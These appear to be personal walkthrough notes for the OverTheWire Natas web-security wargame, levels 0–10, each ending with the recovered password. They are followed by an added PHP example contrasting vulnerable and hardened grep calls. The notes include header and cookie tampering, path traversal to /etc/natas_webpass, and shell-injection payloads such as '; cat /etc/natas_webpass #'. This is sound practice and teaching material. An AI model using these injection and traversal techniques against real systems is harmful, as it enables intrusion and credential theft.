Natas
1-10 https://jhalon.github.io/over-the-wire-natas1/
Natas0
View Page source
gtVrDuiDfck831PqWsLEZy5gyDz1clto
Natas1
Press F12
Console
ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi
Natas2
View Page source
Add /files to the end of the current level website address
sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
Natas3
robots.txt
http://www.robotstxt.org/
http://www.robotstxt.org/robotstxt.html
Add /robots.txt to end of current level web address
User-agent: *
Disallow: /s3cr3t/
Add /s3cr3t/ to the end of current level web address
Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
Natas4
Burp https://portswigger.net/burp
Use Burp to spoof traffic coming from Natas5
Setup Burp
Proxy --> Options
Proxy listeners -- 127.0.0.1:8080
Set Firefox proxy manually to 127.0.0.1:8080, SOCKS v5
Refresh natas4
Open Burp
Proxy --> Intercept
Add referer to spoof as Natas5 -- Referer: http://natas4.natas.labs.overthewire.org/
Click forward
View Natas4 page again
iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
Natas5
Open Burp
Burp https://portswigger.net/burp
Use Burp to spoof traffic coming from Natas5
Setup Burp
Proxy --> Options
Proxy listeners -- 127.0.0.1:8080
Set Firefox proxy manually to 127.0.0.1:8080, SOCKS v5
Refresh natas4
Open Burp
Proxy --> Intercept
Change Cookie info at end from loggedin=0 to loggedin=1
Refresh Natas5 page
aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
Natas6
Click View source code
Navigates to http://natas6.natas.labs.overthewire.org/index-source.html
View PHP between <? and ?>
includes/secret.inc
Add includes/secret.inc to the end of current level web address
New page opens --> Inspect page/F12
Secret = FOEIUWGHFEEUHOFUOIU
Use on natas6 homepage
7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
Natas7
View source code
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
Put /etc/natas_webpass/natas8 at end of http://natas7.natas.labs.overthewire.org/index.php?page=
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
Natas8
Linux with php
php -a
echo base64_decode(strrev(hex2bin('3d3d516343746d4d6d6c315669563362')));
oubWYf2kBq
Or use cryptii (https://cryptii.com/) to decode hex to binary, reverse the text, then base64 decode
W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
Natas9
shell injection
View source code
Original code
passthru("grep -i $key dictionary.txt");
Injected code
; cat /etc/natas_webpass #
Original and injected code
grep -i ; cat /etc/natas_webpass # dictionary.txt
What's happening
grep -i ; // the ; ends the grep command so we can execute our own command
cat /etc/natas_webpass // the injected command
# dictionary.txt // # comments out dictionary.txt
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
Natas10
View source code - search field will not let you use ; | and others
grep -i -e . /etc/natas_webpass/natas11 #
-e specifies the search pattern (a regular expression); . matches any character
Review regular expressions
U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
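
Added example (not part of the original notes or the Natas source): the Natas9 string-built command and the Natas10 character blacklist shown next to two hardened forms. The function names, the blacklist regex and the temporary dictionary file are assumptions made for the illustration.

```php
<?php
// Added example; function names and sample data are constructed, not Natas code.

// Natas9 pattern: user input is pasted straight into a shell command line.
function build_vulnerable(string $key): string {
    return "grep -i $key dictionary.txt";
}

// Natas10 pattern: a character blacklist in front of the same concatenation.
// Assumed filter, based on the note that ; | and others are rejected.
function passes_blacklist(string $key): bool {
    return preg_match('/[;|&]/', $key) !== 1;
}

// Hardened: -F treats input as a fixed string, "--" ends option parsing,
// and escapeshellarg() makes the input a single quoted argument.
function build_hardened(string $key): string {
    return 'grep -i -F -- ' . escapeshellarg($key) . ' dictionary.txt';
}

// Alternative that never starts a shell: search the file in PHP.
function search_dictionary(string $key, string $path): array {
    $hits = [];
    foreach (file($path, FILE_IGNORE_NEW_LINES) ?: [] as $line) {
        if ($key !== '' && stripos($line, $key) !== false) {
            $hits[] = $line;
        }
    }
    return $hits;
}

// Constructed dictionary so the script runs offline.
$dict = tempnam(sys_get_temp_dir(), 'dict');
file_put_contents($dict, "apple\npineapple\nbanana\n");

// First input is benign; the other two are the inputs from the notes above.
$samples = ['apple', '; cat /etc/natas_webpass #', '-e . /etc/natas_webpass/natas11 #'];
foreach ($samples as $key) {
    printf("input:      %s\n", $key);
    printf("vulnerable: %s\n", build_vulnerable($key));
    printf("blacklist:  %s\n", passes_blacklist($key) ? 'accepted' : 'rejected');
    printf("hardened:   %s\n", build_hardened($key));
    printf("in-process: %d match(es)\n\n", count(search_dictionary($key, $dict)));
}
unlink($dict);
```

The third input contains none of the blacklisted characters, so the filter accepts it; only the quoted and in-process versions keep it as data.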